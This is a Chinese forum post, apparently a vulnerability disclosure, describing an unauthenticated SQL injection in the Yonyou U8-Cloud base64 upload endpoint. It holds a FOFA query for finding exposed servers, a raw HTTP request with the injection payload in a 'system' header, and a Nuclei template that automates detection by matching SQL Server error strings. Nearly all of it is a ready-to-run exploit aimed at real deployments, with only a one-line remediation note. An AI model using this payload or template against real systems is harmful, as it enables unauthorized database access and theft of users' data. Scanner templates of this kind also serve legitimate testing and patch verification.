用友-U8-Cloud-base64接口处存在SQL注入漏洞,未授权的攻击者可通过此漏洞获取数据库权限,从而盗取用户数据,造成用户信息泄露。
app="用友-U8-Cloud"
GET /u8cloud/api/file/upload/base64 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
system: -1' or 1=@@version--+
id: yongyou-U8-Cloud-base64-SQL
info:
name: 用友-U8-Cloud-base64存在SQL注入漏洞
author: nobody
severity: high
description: |
用友-U8-Cloud-base64接口处存在SQL注入漏洞,未授权的攻击者可通过此漏洞获取数据库权限,从而盗取用户数据,造成用户信息泄露。
impact: |
授权的攻击者可通过此漏洞获取数据库权限,从而盗取用户数据
remediation: |
升级版本,打补丁
metadata:
verified: true
max-request: 3
fofa-query: app="用友-U8-Cloud"
tags: U8-Cloud,sql
requests:
- raw:
- |
GET /u8cloud/api/file/upload/base64 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
system: -1' or 1=@@version--+
matchers:
- type: dsl
dsl:
- status_code == 200 && contains_all(body,"nvarchar","Microsoft SQL Server")
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.
honker74886
发表于 9个月前
马上复线
评论列表
加载数据中...